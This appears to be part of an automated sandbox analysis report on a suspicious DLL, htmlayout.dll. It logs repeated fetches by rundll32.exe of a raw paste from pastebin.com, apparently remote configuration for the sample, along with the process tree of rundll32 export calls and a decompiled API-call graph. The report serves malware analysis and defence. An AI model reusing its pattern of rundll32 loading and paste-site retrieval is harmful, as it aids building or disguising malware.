          cache-control: public, max-age=1801
          CF-Cache-Status: HIT
          Age: 38
          Last-Modified: Sun, 04 Dec 2022 21:24:32 GMT
          Server: cloudflare
          CF-RAY: 77479cf4e9d59159-FRA
          2022-12-04 21:25:10 UTC3INData Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a
          Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
          2022-12-04 21:25:10 UTC3INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortProcess
          6192.168.2.349724172.67.34.170443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData
          2022-12-04 21:25:11 UTC3OUTGET /raw/kk8ua858 HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: pastebin.com
          2022-12-04 21:25:11 UTC3INHTTP/1.1 200 OK
          Date: Sun, 04 Dec 2022 21:25:11 GMT
          Content-Type: text/plain; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          x-frame-options: DENY
          x-content-type-options: nosniff
          x-xss-protection: 1;mode=block
          cache-control: public, max-age=1801
          CF-Cache-Status: HIT
          Age: 5
          Last-Modified: Sun, 04 Dec 2022 21:25:06 GMT
          Server: cloudflare
          CF-RAY: 77479cf83f18bb65-FRA
          2022-12-04 21:25:11 UTC4INData Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a
          Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
          2022-12-04 21:25:11 UTC4INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortProcess
          7192.168.2.349726104.20.68.143443C:\Windows\SysWOW64\rundll32.exe
          TimestampkBytes transferredDirectionData
          2022-12-04 21:25:12 UTC4OUTGET /raw/kk8ua858 HTTP/1.1
          Connection: Keep-Alive
          Accept: */*
          User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
          Host: pastebin.com
          2022-12-04 21:25:12 UTC4INHTTP/1.1 200 OK
          Date: Sun, 04 Dec 2022 21:25:12 GMT
          Content-Type: text/plain; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          x-frame-options: DENY
          x-content-type-options: nosniff
          x-xss-protection: 1;mode=block
          cache-control: public, max-age=1801
          CF-Cache-Status: HIT
          Age: 40
          Last-Modified: Sun, 04 Dec 2022 21:24:32 GMT
          Server: cloudflare
          CF-RAY: 77479d01389b90dd-FRA
          2022-12-04 21:25:12 UTC4INData Raw: 34 39 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a 42 35 44 37 37 30 45 36 35 31 0d 0a 5b 42 41 43 4b 55 50 30 5d 0d 0a 45 43 31 35 33 33 32 37 31 44 36 35 45 34 36 46 39 42 46 39 30 35 30 30 0d 0a
          Data Ascii: 49EC1533271D65E46F9BF90500B5D770E651[BACKUP0]EC1533271D65E46F9BF90500
          2022-12-04 21:25:12 UTC4INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:22:24:04
          Start date:04/12/2022
          Path:C:\Windows\System32\loaddll32.exe
          Wow64 process (32bit):true
          Commandline:loaddll32.exe "C:\Users\user\Desktop\htmlayout.dll"
          Imagebase:0xaa0000
          File size:116736 bytes
          MD5 hash:1F562FBF37040EC6C43C8D5EF619EA39
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Borland Delphi
          Reputation:moderate

          Target ID:1
          Start time:22:24:04
          Start date:04/12/2022
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff745070000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:2
          Start time:22:24:04
          Start date:04/12/2022
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1
          Imagebase:0xb0000
          File size:232960 bytes
          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Target ID:3
          Start time:22:24:04
          Start date:04/12/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAnimateElement
          Imagebase:0x1350000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Borland Delphi
          Reputation:high

          Target ID:4
          Start time:22:24:04
          Start date:04/12/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1
          Imagebase:0x1350000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Borland Delphi
          Reputation:high

          Target ID:5
          Start time:22:24:09
          Start date:04/12/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAppendMasterCSS
          Imagebase:0x1350000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Borland Delphi
          Reputation:high

          Target ID:6
          Start time:22:24:12
          Start date:04/12/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe C:\Users\user\Desktop\htmlayout.dll,HTMLayoutAttachEventHandler
          Imagebase:0x1350000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Borland Delphi
          Reputation:high

          Target ID:17
          Start time:22:24:33
          Start date:04/12/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAnimateElement
          Imagebase:0x1350000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Borland Delphi
          Reputation:high

          Target ID:18
          Start time:22:24:33
          Start date:04/12/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAppendMasterCSS
          Imagebase:0x1350000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Borland Delphi
          Reputation:high

          Target ID:19
          Start time:22:24:33
          Start date:04/12/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAttachEventHandler
          Imagebase:0x1350000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Borland Delphi

          Target ID:20
          Start time:22:24:34
          Start date:04/12/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutAttachEventHandlerEx
          Imagebase:0x1350000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Borland Delphi

          Target ID:21
          Start time:22:24:34
          Start date:04/12/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",HTMLayoutCallBehaviorMethod
          Imagebase:0x1350000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:Borland Delphi

          Target ID:22
          Start time:22:24:36
          Start date:04/12/2022
          Path:C:\Windows\SysWOW64\WerFault.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 756
          Imagebase:0x1080000
          File size:434592 bytes
          MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language

          Target ID:23
          Start time:22:24:39
          Start date:04/12/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\SysWOW64\rundll32.exe"
          Imagebase:0x1350000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language

          Target ID:24
          Start time:22:24:50
          Start date:04/12/2022
          Path:C:\Windows\SysWOW64\rundll32.exe
          Wow64 process (32bit):true
          Commandline:"C:\Windows\SysWOW64\rundll32.exe"
          Imagebase:0x1350000
          File size:61952 bytes
          MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language

          Reset < >

            Execution Graph

            Execution Coverage:9.8%
            Dynamic/Decrypted Code Coverage:100%
            Signature Coverage:0%
            Total number of Nodes:561
            Total number of Limit Nodes:8
            execution_graph 5871 478a08c 5872 478a0fe 5871->5872 5873 4789fec 5871->5873 5873->5872 5874 4787028 2 API calls 5873->5874 5875 478a086 5874->5875 5206 479010c 5208 4790114 5206->5208 5207 4790150 5208->5207 5210 478d478 5208->5210 5211 478d4a5 5210->5211 5212 478d486 5210->5212 5211->5207 5212->5211 5215 478d430 5212->5215 5216 478d45c 5215->5216 5217 478d440 5215->5217 5216->5207 5219 478e6a4 5217->5219 5220 478e6e5 5219->5220 5223 478e580 5220->5223 5222 478e71e 5222->5216 5225 478e5a1 5223->5225 5224 478e61c 5224->5222 5225->5224 5229 478dc6c RtlEnterCriticalSection 5225->5229 5227 478e638 5227->5224 5228 478dc6c 11 API calls 5227->5228 5228->5224 5230 478dcb8 RtlLeaveCriticalSection 5229->5230 5231 478dc98 5229->5231 5234 478dcc9 5230->5234 5232 478dca9 RtlLeaveCriticalSection 5231->5232 5233 478dd5a 5232->5233 5233->5227 5235 478dd27 RtlEnterCriticalSection 5234->5235 5239 478dcea 5234->5239 5240 478db50 GetThreadUILanguage 5234->5240 5236 478dd3f 5235->5236 5238 478dd50 RtlLeaveCriticalSection 5236->5238 5238->5233 5239->5235 5241 478db6c 5240->5241 5242 478dbc5 5240->5242 5253 478db0c GetThreadPreferredUILanguages 5241->5253 5244 478db0c 2 API calls 5242->5244 5248 478dbcd 5244->5248 5246 478dc14 SetThreadPreferredUILanguages 5249 478db0c 2 API calls 5246->5249 5248->5246 5252 478dc55 5248->5252 5250 478dc2a 5249->5250 5251 478dc45 SetThreadPreferredUILanguages 5250->5251 5250->5252 5251->5252 5252->5239 5254 478db2d 5253->5254 5255 478db46 SetThreadPreferredUILanguages 5253->5255 5256 478db36 GetThreadPreferredUILanguages 5254->5256 5255->5242 5256->5255 5257 4977df0 5262 4977cc4 5257->5262 5259 4977dff 5260 4977e0c 5259->5260 5268 4978a98 5259->5268 5264 4977cdd 5262->5264 5263 4977dbe 5263->5259 5264->5263 5282 4977b58 5264->5282 5266 4977d78 5266->5263 5267 4977dbc DispatchMessageW 5266->5267 5267->5263 5309 4978a0c 5268->5309 5271 4979140 21 API calls 5272 4978ae1 5271->5272 5313 4978cf4 5272->5313 5274 4978b03 5275 4978b49 5274->5275 5277 4978b51 5274->5277 5278 4978b53 5274->5278 5345 49789a8 5275->5345 5280 4978bd3 5277->5280 5318 4849070 5277->5318 5278->5277 5281 49789a8 20 API calls 5278->5281 5280->5260 5281->5277 5283 4977b83 5282->5283 5284 4977b6c 5282->5284 5283->5266 5284->5283 5286 4979140 5284->5286 5287 4979156 5286->5287 5291 4979166 5286->5291 5292 49790cc 5287->5292 5289 497915d 5296 4975a08 5289->5296 5291->5283 5293 49790da 5292->5293 5295 497910c 5292->5295 5293->5295 5300 4978ed8 5293->5300 5295->5289 5297 4975a14 5296->5297 5298 4975a7d 5297->5298 5304 4977df0 5297->5304 5298->5291 5301 4978ee8 5300->5301 5302 4978f14 5301->5302 5303 4979140 21 API calls 5301->5303 5302->5295 5303->5302 5305 4977cc4 21 API calls 5304->5305 5306 4977dff 5305->5306 5307 4977e0c 5306->5307 5308 4978a98 21 API calls 5306->5308 5307->5297 5308->5307 5310 4978a18 5309->5310 5349 48c2914 5310->5349 5315 4978d08 5313->5315 5314 4978d1e 5314->5274 5315->5314 5389 48ebaf4 5315->5389 5317 4978d3c 5317->5274 5319 4849084 5318->5319 5320 484908d 5318->5320 5319->5280 5456 484973c 5320->5456 5323 48490cb 5328 48490cf 5323->5328 5324 484973c 20 API calls 5325 48490a4 5324->5325 5467 47ac43c 5325->5467 5327 48490c6 5473 4789ee0 5327->5473 5479 47896f4 5328->5479 5331 48490f1 5483 478947c 5331->5483 5333 48490f9 5334 4849266 5333->5334 5335 4834cfc 20 API calls 5333->5335 5334->5280 5336 4849153 5335->5336 5492 4834b70 5336->5492 5338 4849160 5496 478965c 5338->5496 5340 484916a 5341 47896f4 2 API calls 5340->5341 5342 484921b 5341->5342 5343 478947c 5 API calls 5342->5343 5344 4849223 5343->5344 5344->5280 5346 49789b5 5345->5346 5347 4978a08 5346->5347 5562 497491c 5346->5562 5347->5277 5350 48c2928 5349->5350 5352 48c294e 5350->5352 5353 48ca3cc 5350->5353 5352->5271 5352->5272 5355 48ca44b 5353->5355 5356 48ca3eb 5353->5356 5354 48ca482 5354->5352 5355->5354 5360 4834cfc 5355->5360 5356->5355 5358 4834cfc 20 API calls 5356->5358 5359 48ca3cc 20 API calls 5356->5359 5358->5356 5359->5356 5361 4834d09 5360->5361 5362 4834d18 5360->5362 5364 4834c10 5361->5364 5362->5355 5369 479010c 5364->5369 5366 4834c4e 5373 47ac274 5366->5373 5368 4834c5d 5368->5368 5371 4790114 5369->5371 5370 4790150 5370->5366 5371->5370 5372 478d478 11 API calls 5371->5372 5372->5370 5374 47ac280 5373->5374 5377 47a7570 5374->5377 5376 47ac2ad 5376->5368 5380 47a7598 5377->5380 5383 47a75c8 5380->5383 5382 47a7590 5382->5376 5384 47a75d1 5383->5384 5385 47a7480 20 API calls 5384->5385 5387 47a7631 5384->5387 5385->5387 5386 47a7698 5386->5382 5387->5386 5388 47a7480 20 API calls 5387->5388 5388->5387 5390 48ebafa 5389->5390 5393 48b3ba4 5390->5393 5392 48ebb0f 5392->5317 5394 48b3baa 5393->5394 5397 48795f0 5394->5397 5396 48b3bbf 5396->5392 5398 48795f6 5397->5398 5401 484bdac 5398->5401 5400 487960b 5400->5396 5402 484bdb2 5401->5402 5405 484a388 5402->5405 5404 484bdc7 5404->5400 5406 484a38f 5405->5406 5407 484a3b4 5406->5407 5409 484a7ec 5406->5409 5407->5404 5410 484a80e 5409->5410 5411 484a842 5410->5411 5417 484a8a4 5410->5417 5421 484a6e8 5411->5421 5414 484a85a 5416 484a874 5414->5416 5427 484b8ac 5414->5427 5416->5407 5418 484a8b9 5417->5418 5432 484a72c 5418->5432 5420 484a8d6 5420->5411 5422 484a6f5 5421->5422 5443 47c33ec 5422->5443 5425 484a723 5425->5414 5430 484b8bc 5427->5430 5428 484b8f5 5428->5416 5430->5428 5431 484b8ac 20 API calls 5430->5431 5450 484b4ec 5430->5450 5431->5430 5433 484a746 5432->5433 5436 484a7a7 5432->5436 5434 47c1a9c 13 API calls 5433->5434 5435 484a753 5434->5435 5437 484a770 5435->5437 5438 484a75e 5435->5438 5436->5420 5439 47c2e54 13 API calls 5437->5439 5440 47c41d8 13 API calls 5438->5440 5441 484a76e 5439->5441 5440->5441 5441->5436 5442 47c2e54 13 API calls 5441->5442 5442->5436 5444 47c4680 9 API calls 5443->5444 5445 47c3403 5444->5445 5445->5425 5446 484b39c 5445->5446 5447 484b3b1 5446->5447 5448 47c47c4 20 API calls 5447->5448 5449 484b3c7 5448->5449 5449->5425 5451 484b4f8 5450->5451 5452 484b50a 5450->5452 5454 4834c10 20 API calls 5451->5454 5453 47c1a9c 13 API calls 5452->5453 5455 484b517 5453->5455 5454->5452 5455->5430 5500 4791318 5456->5500 5458 4849742 5459 4849796 5458->5459 5507 4847838 5458->5507 5460 4791318 2 API calls 5459->5460 5462 4849092 5460->5462 5462->5323 5462->5324 5465 4849757 5511 485c184 5465->5511 5466 4791318 2 API calls 5466->5459 5468 47ac44a 5467->5468 5469 479010c 11 API calls 5468->5469 5470 47ac474 5469->5470 5471 47a7570 20 API calls 5470->5471 5472 47ac482 5471->5472 5472->5327 5474 4789ee4 5473->5474 5476 4789eee 5473->5476 5540 478a710 5474->5540 5478 4789f2c 5476->5478 5543 478701c 5476->5543 5480 47896fc 5479->5480 5482 4789712 5480->5482 5552 4789320 5480->5552 5482->5331 5488 478948a 5483->5488 5484 47894b3 GetTickCount 5484->5488 5485 4789525 GetTickCount 5485->5488 5489 47894d8 5485->5489 5486 47894cb GetTickCount 5486->5488 5486->5489 5487 478955c GetTickCount 5490 478956c 5487->5490 5488->5484 5488->5485 5488->5486 5488->5487 5488->5489 5489->5333 5490->5487 5490->5489 5491 4789586 GetTickCount 5490->5491 5491->5490 5493 4834b7b 5492->5493 5494 4834c10 20 API calls 5493->5494 5495 4834b8f 5493->5495 5494->5495 5495->5338 5497 4789664 5496->5497 5498 47896f4 2 API calls 5497->5498 5499 478966b 5498->5499 5499->5340 5501 479134d TlsGetValue 5500->5501 5502 4791327 5500->5502 5503 4791332 5501->5503 5504 4791357 5501->5504 5502->5458 5505 4791337 TlsGetValue 5503->5505 5504->5458 5506 4791346 5505->5506 5506->5458 5508 484783e 5507->5508 5525 48493a4 5508->5525 5510 484785d 5510->5465 5531 485c2d0 5511->5531 5513 485c1ab 5514 485c1e8 5513->5514 5519 485c1fe 5513->5519 5515 47c33ec 9 API calls 5514->5515 5516 485c1fc 5515->5516 5537 485c374 5516->5537 5519->5516 5520 479010c 11 API calls 5519->5520 5521 485c22e 5520->5521 5522 47ac274 20 API calls 5521->5522 5523 485c23d 5522->5523 5524 4789ee0 2 API calls 5523->5524 5524->5516 5527 48493b6 5525->5527 5526 4849452 5526->5510 5527->5526 5528 47ac43c 20 API calls 5527->5528 5529 484944d 5528->5529 5530 4789ee0 2 API calls 5529->5530 5530->5526 5532 485c2df 5531->5532 5533 47896f4 2 API calls 5532->5533 5534 485c2e7 5533->5534 5535 478947c 5 API calls 5534->5535 5536 485c2ef 5535->5536 5536->5513 5538 478965c 2 API calls 5537->5538 5539 4849791 5538->5539 5539->5466 5546 478a704 5540->5546 5544 4791318 2 API calls 5543->5544 5545 4787021 5544->5545 5545->5478 5549 478a5d4 5546->5549 5551 478a5f0 5549->5551 5550 4786fe8 TlsGetValue TlsGetValue 5550->5551 5551->5550 5553 4789329 5552->5553 5555 478932e 5552->5555 5556 47891f4 5553->5556 5555->5482 5557 478920e 5556->5557 5558 478921c GetLogicalProcessorInformation 5557->5558 5561 4789264 5557->5561 5559 478922b 5558->5559 5558->5561 5560 478923d GetLogicalProcessorInformation 5559->5560 5559->5561 5560->5561 5561->5555 5563 4834cfc 20 API calls 5562->5563 5564 497492c 5563->5564 5564->5346 5703 4849283 5704 478965c 2 API calls 5703->5704 5705 484929a 5704->5705 5866 47b7fac 5867 479010c 11 API calls 5866->5867 5868 47b7fcc 5867->5868 5869 4789ee0 2 API calls 5868->5869 5870 47b7fe0 5869->5870 5828 478a0d2 5829 478a0fe 5828->5829 5830 4789fec 5828->5830 5830->5829 5833 4787028 5830->5833 5834 478a704 2 API calls 5833->5834 5835 4787033 5834->5835 5565 4b7238c 5566 4b723a4 5565->5566 5571 4b65ff4 5566->5571 5568 4b72402 5598 4978064 5568->5598 5570 4b7240e 5572 4b66071 5571->5572 5573 4b65ff8 5571->5573 5572->5568 5609 4b65f50 5573->5609 5575 4b66002 5576 4b65f50 20 API calls 5575->5576 5577 4b6600c 5576->5577 5578 4b65f50 20 API calls 5577->5578 5579 4b66016 5578->5579 5580 4b65f50 20 API calls 5579->5580 5581 4b66020 5580->5581 5582 4b65f50 20 API calls 5581->5582 5583 4b6602a 5582->5583 5584 4b65f50 20 API calls 5583->5584 5585 4b66034 5584->5585 5586 4b65f50 20 API calls 5585->5586 5587 4b6603e 5586->5587 5588 4b65f50 20 API calls 5587->5588 5589 4b66048 5588->5589 5590 4b65f50 20 API calls 5589->5590 5591 4b66052 5590->5591 5592 4b65f50 20 API calls 5591->5592 5593 4b6605c 5592->5593 5594 4b65f50 20 API calls 5593->5594 5595 4b66066 5594->5595 5596 4b65f50 20 API calls 5595->5596 5597 4b66070 5596->5597 5597->5568 5599 4978090 5598->5599 5600 497815d 5599->5600 5601 4978113 5599->5601 5603 49780f4 5599->5603 5604 4978115 5599->5604 5600->5570 5601->5600 5602 4977df0 21 API calls 5601->5602 5602->5601 5627 4977454 5603->5627 5636 496dbe8 5604->5636 5607 49780fc 5607->5601 5633 4972f1c 5607->5633 5612 4b6d674 5609->5612 5611 4b65f74 5611->5575 5614 4b6d67c 5612->5614 5613 4b6d6ad 5613->5611 5614->5613 5618 47a5c38 5614->5618 5616 47a5c38 20 API calls 5617 4b6d70c 5616->5617 5617->5613 5617->5616 5619 47a5c48 5618->5619 5620 47a5c69 5619->5620 5622 47a47e8 5619->5622 5620->5617 5623 47ac43c 20 API calls 5622->5623 5624 47a4801 5623->5624 5625 4789ee0 2 API calls 5624->5625 5626 47a4806 5625->5626 5626->5620 5628 4977463 5627->5628 5632 4977494 5628->5632 5640 49766b8 5628->5640 5630 4977472 5643 4976914 5630->5643 5632->5607 5634 496dbe8 20 API calls 5633->5634 5635 4972f28 5634->5635 5635->5601 5637 496dc0e 5636->5637 5639 496dbf8 5636->5639 5637->5639 5654 496f758 5637->5654 5639->5601 5650 49765b8 5640->5650 5644 4976930 5643->5644 5647 49769ce 5643->5647 5645 4976938 5644->5645 5646 49769d9 5644->5646 5645->5647 5649 4834cfc 20 API calls 5645->5649 5646->5647 5648 4834cfc 20 API calls 5646->5648 5647->5632 5648->5646 5649->5645 5651 4976654 5650->5651 5652 49765cd 5650->5652 5651->5630 5652->5651 5653 4834cfc 20 API calls 5652->5653 5653->5652 5655 496f770 5654->5655 5656 496fafa 5654->5656 5655->5656 5657 496f79e 5655->5657 5658 496f789 5655->5658 5656->5639 5660 496f7ca 5657->5660 5662 496f7b5 5657->5662 5668 496ef4c 5658->5668 5661 496f796 5660->5661 5680 4975ce4 5660->5680 5665 496ef4c 20 API calls 5661->5665 5663 496ef4c 20 API calls 5662->5663 5663->5661 5667 496f7e5 5665->5667 5666 49748d4 20 API calls 5666->5667 5667->5656 5667->5666 5672 496ef5d 5668->5672 5669 496ef9e 5690 4975c74 5669->5690 5672->5669 5673 496ef8a 5672->5673 5687 49748d4 5672->5687 5675 49748d4 20 API calls 5673->5675 5674 496ef96 5674->5661 5675->5674 5676 49748d4 20 API calls 5677 496efa8 5676->5677 5677->5674 5677->5676 5678 496efcd 5677->5678 5679 49748d4 20 API calls 5678->5679 5679->5674 5697 4975c94 5680->5697 5683 4975d04 5683->5661 5684 4975c74 20 API calls 5685 4975cfe 5684->5685 5686 4975c94 20 API calls 5685->5686 5686->5683 5688 4834cfc 20 API calls 5687->5688 5689 49748e4 5688->5689 5689->5672 5693 4975c3c 5690->5693 5692 4975c79 5692->5677 5694 4975c4c 5693->5694 5696 4975c62 5693->5696 5695 4834cfc 20 API calls 5694->5695 5694->5696 5695->5694 5696->5692 5698 4975ca7 5697->5698 5699 49748d4 20 API calls 5698->5699 5700 4975cc7 5698->5700 5702 4975cd4 5698->5702 5699->5698 5701 49748d4 20 API calls 5700->5701 5701->5702 5702->5683 5702->5684 5855 478f833 5856 478f839 5855->5856 5857 478f850 5855->5857 5859 478f1b4 5856->5859 5862 478f058 5859->5862 5861 478f1e3 5861->5857 5863 478f06c 5862->5863 5864 478f061 5862->5864 5863->5861 5865 478947c 5 API calls 5864->5865 5865->5863 5876 478f784 5879 478f0c4 5876->5879 5878 478f79b 5880 478f058 5 API calls 5879->5880 5881 478f0f4 5880->5881 5882 478f16b 5881->5882 5883 478f151 5881->5883 5886 478f125 5881->5886 5885 478cf1c 9 API calls 5882->5885 5884 478cf1c 9 API calls 5883->5884 5887 478f166 5884->5887 5885->5887 5886->5878 5887->5878 5706 4976808 5708 497681f 5706->5708 5707 49768dc 5708->5707 5710 478cf1c 5708->5710 5713 478cc74 5710->5713 5712 478cf26 5712->5707 5714 478cc97 5713->5714 5715 478ccb2 5713->5715 5714->5712 5716 478cd20 5715->5716 5718 478cded 5715->5718 5723 478cd87 5716->5723 5724 478cc30 5716->5724 5718->5723 5741 478c450 5718->5741 5719 478cc74 9 API calls 5719->5723 5721 478cd38 5721->5723 5734 478c328 5721->5734 5723->5714 5723->5719 5725 4791318 2 API calls 5724->5725 5726 478cc39 5725->5726 5727 478cc4f 5726->5727 5728 478cc41 5726->5728 5731 4791318 2 API calls 5727->5731 5729 4791318 2 API calls 5728->5729 5730 478cc46 5729->5730 5730->5721 5732 478cc5d 5731->5732 5733 4791318 2 API calls 5732->5733 5733->5730 5735 478c344 5734->5735 5736 478c388 5734->5736 5735->5736 5737 478c3c2 5735->5737 5740 478c3f1 5735->5740 5736->5723 5737->5736 5739 478c328 9 API calls 5737->5739 5739->5737 5740->5736 5745 478c04c 5740->5745 5742 478c459 5741->5742 5743 478c461 5741->5743 5815 478c210 5742->5815 5743->5723 5746 478c1eb 5745->5746 5750 478c06f 5745->5750 5746->5740 5747 478c328 9 API calls 5747->5750 5748 478c04c 9 API calls 5748->5750 5750->5746 5750->5747 5750->5748 5752 478fb24 5750->5752 5758 478faf8 5750->5758 5753 478fb36 5752->5753 5754 478faf8 5 API calls 5753->5754 5755 478fb4b 5754->5755 5762 478fa8c 5755->5762 5757 478fb62 5757->5750 5759 478fb1d 5758->5759 5760 478fb03 5758->5760 5759->5750 5807 478fac4 5760->5807 5763 478fabf 5762->5763 5764 478fa97 5762->5764 5763->5757 5766 478f6cc 5764->5766 5767 478f6e8 5766->5767 5768 478f6f0 5766->5768 5776 478f568 5767->5776 5785 478f40c 5768->5785 5771 478f75b 5771->5763 5772 478f718 5772->5771 5789 478f4d4 5772->5789 5777 478f61d 5776->5777 5778 478f581 5776->5778 5777->5768 5779 478f592 5778->5779 5781 4789320 2 API calls 5778->5781 5780 478947c 5 API calls 5779->5780 5784 478f5c1 5780->5784 5781->5779 5782 478f5f0 5782->5768 5784->5782 5800 478f3f8 5784->5800 5786 478f41f 5785->5786 5787 478f415 5785->5787 5786->5772 5788 478947c 5 API calls 5787->5788 5788->5786 5790 478f4dc 5789->5790 5791 478f4e5 5790->5791 5803 478efa4 5790->5803 5793 478f288 5791->5793 5794 478f2a2 5793->5794 5795 478f2ab 5794->5795 5797 478f2c5 5794->5797 5796 478cf1c 9 API calls 5795->5796 5798 478f2c0 5796->5798 5797->5798 5799 478cf1c 9 API calls 5797->5799 5798->5771 5799->5798 5801 4789320 2 API calls 5800->5801 5802 478f400 5801->5802 5802->5784 5804 478efaf 5803->5804 5805 4789320 2 API calls 5804->5805 5806 478efb6 5805->5806 5806->5791 5808 478fac8 5807->5808 5809 478fad5 5807->5809 5811 478f7a4 5808->5811 5809->5759 5812 478f7c4 5811->5812 5814 478f7ec 5811->5814 5813 478f40c 5 API calls 5812->5813 5813->5814 5814->5809 5816 478c225 5815->5816 5820 478c242 5815->5820 5817 478c239 5816->5817 5818 478c2b5 5816->5818 5816->5820 5817->5820 5822 478bea4 5817->5822 5818->5820 5821 478c210 9 API calls 5818->5821 5820->5743 5821->5818 5823 478c033 5822->5823 5824 478bec9 5822->5824 5823->5817 5824->5823 5825 478fb24 9 API calls 5824->5825 5826 478c210 9 API calls 5824->5826 5827 478bea4 9 API calls 5824->5827 5825->5824 5826->5824 5827->5824 5836 484922b 5837 4849234 5836->5837 5839 4849149 5836->5839 5851 4789760 5837->5851 5840 4849266 5839->5840 5841 4834cfc 20 API calls 5839->5841 5842 4849153 5841->5842 5843 4834b70 20 API calls 5842->5843 5844 4849160 5843->5844 5845 478965c 2 API calls 5844->5845 5846 484916a 5845->5846 5847 47896f4 2 API calls 5846->5847 5848 484921b 5847->5848 5849 478947c 5 API calls 5848->5849 5850 4849223 5849->5850 5852 4789768 5851->5852 5853 47896f4 2 API calls 5852->5853 5854 478976f 5853->5854 5854->5839
